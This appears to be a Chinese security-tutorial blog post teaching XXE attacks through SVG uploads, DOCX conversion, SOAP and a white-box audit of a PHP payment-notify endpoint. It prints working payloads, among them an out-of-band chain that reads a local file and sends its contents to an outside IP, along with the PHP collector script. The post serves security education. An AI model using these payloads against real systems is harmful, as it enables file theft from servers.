当前位置: 首页 > news >正文

Web攻防-XMLXXE上传解析文件预览接口服务白盒审计应用功能SRC报告

知识点:
1、WEB攻防-XML&XXE-黑盒功能点挖掘
2、WEB攻防-XML&XXE-白盒函数点挖掘
3、WEB攻防-XML&XXE-SRC报告

一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘

1、不安全的图像读取-SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://dnslog.cn" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text>
</svg>

在这里插入图片描述
在这里插入图片描述

2、不安全的文档转换-DOCX

参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
也可以使用工具直接生成:https://github.com/whitel1st/docem

3、不安全的传递服务-SOAP

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-XML&XXE-白盒函数点挖掘

1、漏洞函数simplexml_load_string

在这里插入图片描述

2、pe_getxml函数调用了漏洞函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、wechat_getxml调用了pe_getxml

在这里插入图片描述
在这里插入图片描述

4、notify_url调用了wechat_getxml

在这里插入图片描述
在这里插入图片描述

5、访问notify_url文件触发wechat_getxml函数,构造Paylod测试。

在这里插入图片描述

先尝试读取文件,无回显后带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<root>&send;</root>

在这里插入图片描述
在这里插入图片描述

然后带外传递数据解决无回显:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

三、演示案例-WEB攻防-XML&XXE-SRC报告

https://xz.aliyun.com/news/16463
https://mp.weixin.qq.com/s/biQgwMU2v1I92CsDOFRB7g
https://mp.weixin.qq.com/s/1pj9sbwKT6RjIiLgNC7-Gg
https://mp.weixin.qq.com/s/Mgd91_Iie-wZU7MqP5oCXw

http://www.lryc.cn/news/581844.html

相关文章:

  • 网安系列【8】之暴力破解入门
  • Java设计模式之行为型模式(策略模式)介绍与说明
  • 125.【C语言】数据结构之归并排序递归解法
  • docker-compse安装nginx
  • Win11 安装 Visual Studio(保姆教程 - 更新至2025.07)
  • Altium Designer使用入门(非精通)教程 第三章(PCB绘制)
  • Application的onLowMemory从Android API 34开始系统不再触发,从API 35开始废弃
  • 【机器学习笔记Ⅰ】12 逻辑回归
  • get: ()=>state 和get: ()=>{state}
  • std::vector<bool>有什么特殊的吗
  • Podman与Docker详细比较:从原理到使用
  • 单片机总复习
  • 开关电源抄板学习
  • Spring Cloud Alibaba/Spring Boot整合华为云存储实例(REST API方式)
  • 反向遍历--当你修改一个元素的outerHTML时,该元素会被从 DOM 中移除
  • Python设计小游戏方法简介
  • 【C++】string类(二)相关接口介绍及其使用
  • 2025年03月 C/C++(四级)真题解析#中国电子学会#全国青少年软件编程等级考试
  • LeetCode 每日一题 2025/6/30-2025/7/6
  • WPF学习笔记(26)CommunityToolkit.Mvvm与MaterialDesignThemes
  • 端到端矢量化地图构建与规划
  • 【机器学习笔记 Ⅱ】1 神经网络
  • 从源码到思想:OneCode框架模块化设计如何解决前端大型应用痛点
  • RDF安装使用教程
  • 408第三季part2 - 计算机网络 - 传输层
  • 计算机网络实验——配置ACL
  • 植物大战僵尸杂交重制版1.0,经典焕新,重燃策略塔防之火
  • C 语言指针与作用域详解
  • 计算机网络实验——互联网安全实验
  • SQL Server从入门到项目实践(超值版)读书笔记 20